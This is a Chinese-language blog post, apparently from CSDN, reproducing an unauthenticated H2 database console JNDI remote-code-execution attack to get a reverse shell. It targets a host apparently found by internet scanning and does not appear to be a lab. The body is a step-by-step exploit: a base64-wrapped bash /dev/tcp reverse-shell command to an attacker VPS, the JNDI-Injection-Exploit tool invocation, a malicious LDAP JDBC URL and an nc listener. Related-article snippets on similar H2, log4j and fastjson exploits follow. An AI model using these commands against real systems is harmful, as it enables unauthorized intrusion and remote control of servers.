h2 database console JNDI RCE复现(反弹shell)

最新推荐文章于 2025-10-25 20:54:30 发布
原创 最新推荐文章于 2025-10-25 20:54:30 发布 · 948 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库

扫描ip发现资产H2 database

http://150.xxx.xxx.xxx:20051

上网搜关键字发现该系统存在未授权RCE命令执行

1、构造payload:

用到网站:https://ares-x.com/tools/runtime-exec,在里面输入我们的反弹shell命令:bash -i >& /dev/tcp/vps服务器ip地址/5555 0>&1,他会自动生成base64加密的payload:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcCaaaaauNDEuNzcuMjA2LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

2、下载利用工具,这里我们用到工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

下载好之后在攻击机(公网服务器)执行:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTAuNDEuNzaaaaajA2LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "vps服务器ip"

-C 执行命令,这里放入我们生成的payload:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcaaaaEuNzcuMjA2LzU1NTUgMD4mMQ==}|{base64,-d}

-A 攻击机ip:vps服务器ip

执行之后会出现下面好几种payload,经过测试标粉的可以成功执行

3、利用payload进行反弹

(1)、配置定义:

  • Setting Name: Generic JNDI Data Source (名称随意)
  • Driver Class: javax.naming.InitialContext (JDK自带也不用考虑额外的驱动)
  • JDBC URL: ldap://vps服务器ip:1389/f7p7w0 (恶意LDAP Server)
  • 由于是匿名的,User Name和Password均为空

(2)、监听我们反弹过来的端口:nc -lvvp 5555

(3)、执行测试连接

直接连接,然后会发现已经接收到反弹过来的shell了

敢敢0.0
关注
H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 4063
H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
【实战系列4】H2 Database Console未授权访问/命令执行漏洞到msf内网提权渗透
04-13 1772
通过H2Database Console的命令执行漏洞,结合windows的powershell反弹shell,再利用msf提权并开启rdp服务,在管理员修改了默认的rdp端口3389的情况下,利用命令找到真正的rdp服务端口,远程连接控制目标主机。
h2 database console JNDI RCE复现
12-09 1926
h2 database console JNDI RCE复现
restart h2 database query RCE复现
12-09 3390
restart h2 database query RCE复现
深入分析H2数据库控制台中无需身份验证的RCE漏洞
HBohan的博客
01-20 2760
H2是一个非常流行的开源Java SQL数据库,提供一个轻量级的内存解决方案,使得用户无需将数据存储在磁盘上。这使得它成为各种项目的首选数据存储解决方案:从Spring Boot等网络平台到ThingWorks等物联网平台。而com.h2database:h2包则是最流行的50个Maven包之一,具有近7000个工件依赖项。
H2 Database Console 未授权访问复现
不想当脚本小子的脚本小子
01-27 1765
漏洞概述: H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 环境搭建 使用vulhub来安装环境 进入h2
复现log4j2jndi注入成功反弹shell
ailx10
02-18 469
在Apache Solr 中复现的漏洞,获得ailx101956 次咨询4.9网络安全优秀回答者互联网行业 安全攻防员去咨询。
spring相关漏洞复现
Shanfenglan's blog
12-30 1576
文章目录1. H2 Database web端未授权访问导致的rce2. Spring Security OAuth2 rce -- CVE-2016-49773. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273) 1. H2 Database web端未授权访问导致的rce 2. Spring Security OAuth2 rce – CVE-2016-4977 Spring Se
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 2297
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
DAY78服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE 漏洞
m0_74402888的博客
09-22 1906
1、数据库-Redis-未授权RCE&CVE2数据库-Couchdb-未授权RCE&CVE3、数据库-H2database-未授权RCE&CVE1、复现环境:Vulfocus(官方在线的无法使用,需要自己本地搭建)官方手册:https://fofapro.github.io/vulfocus/#/本地搭建参考文章:https://blog.csdn.net/m0_60571842/article/details/1356773182、服务判断:端口扫描:利用服务开启后目标端口开放判断。
数据库安全(redis、couchdb、h2database)CVE复现
weixin_65049289的博客
03-30 950
数据库安全(redis、couchdb、h2database
H2 Database Console 未授权访问
黑白的博客
12-20 4934
声明 好好学习,天天向上 漏洞描述 H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 影响范围 Spring Boot
Spring Boot Actuator H2 RCE复现
keocce的博客
05-05 1127
0x00 前言米妮网 https://www.amini.net Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。 0x01 环境搭建 (...
高并发webserver_interview
2301_77209356的博客
10-21 862
这是因为在并发场景下,更新缓存的时序难以保证,极易导致Redis与MySQL数据永久不一致。而删除缓存是一种‘惰性失效’策略,虽然会引发一次缓存穿透,但能确保下一个读请求一定会从数据库加载到最准确的数据,从而简单有力地保证了数据的最终一致性。相比之下,用 MySQL 或其他数据结构来实现,要么性能瓶颈明显,要么实现复杂度太高。file_url:类似192.168.1.2:80/group1/M00/00/00/xxx.png。file_id:⽂件id 类似group1/M00/00/00/xxx.png。
Java事故排查
最新发布
sinat_28694519的博客
10-25 568
作为一名软件开发人员,经常会遇到各种各样的事故,一般凭借日志就可以定位到异常问题,然后修复测试,即可验证是否解决,这种较为简单的问题。复杂一点的是,长时间运行出现的问题,比如运行几天之后,程序发生异常,这种不是部署上线后立即发现的,很难排查,但是一般也可以归结为并发性能异常、内存漏洞之类异常。这种情况,日志比较少,需要dump程序的信息,进行分析,以内存泄露为例来说,需要定位到程序中的大对象,然后查看相关代码定位。
面试鸭Java八股之后端场景面试题(下)
小小博客
10-24 859
这个设计方案的核心是“一个队列保顺序,一个令牌桶控流速”。分布式:通过Redis实现中心化的协调,通过无状态Worker集群实现水平扩展。FIFO:通过单一消息队列(或Kafka单分区)和正确的重试逻辑(失败消息回退到队头)来严格保证。限流与用满:通过Redis实现的令牌桶算法,将第三方调用速率精确控制在100 TPS。只要队列不空,Worker会持续尝试,确保每秒100个额度被充分利用。这是一个在理论和实践中都非常可靠的设计,被广泛应用于需要严格限流和顺序处理的金融、交易等场景。
记录一次线上oom问题排查
北冥的博客
10-21 1328
截图显示的内存使用情况表明,存在大量的。
SQLiteStudio下载安装图解教程(附安装包)
数据结构和算法教程(C语言版)
10-24 1462
SQLiteStudio是一款免费开源的SQLite图形化管理工具,支持Windows/macOS/Linux多平台。本文提供最新版安装包下载及图文安装教程,详细演示了绿色版解压即用的安装过程。该软件功能全面,支持Excel/CSV导入、数据导出多种格式,具有代码高亮、自动补全等实用功能。相比同类工具,SQLiteStudio体积小、启动快、无广告,配置保存在本地目录,便于携带使用,是管理SQLite数据库的高效选择。
log4j2 jndi注入复现代码
01-28
### log4j2 JNDI 注入漏洞复现示例代码 为了展示如何通过特定配置和代码片段来重现Log4j2中的JNDI注入漏洞,以下是具体的Java应用程序实例: #### Java 应用程序设置 首先创建一个简单的Spring Boot项目或任何标准...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值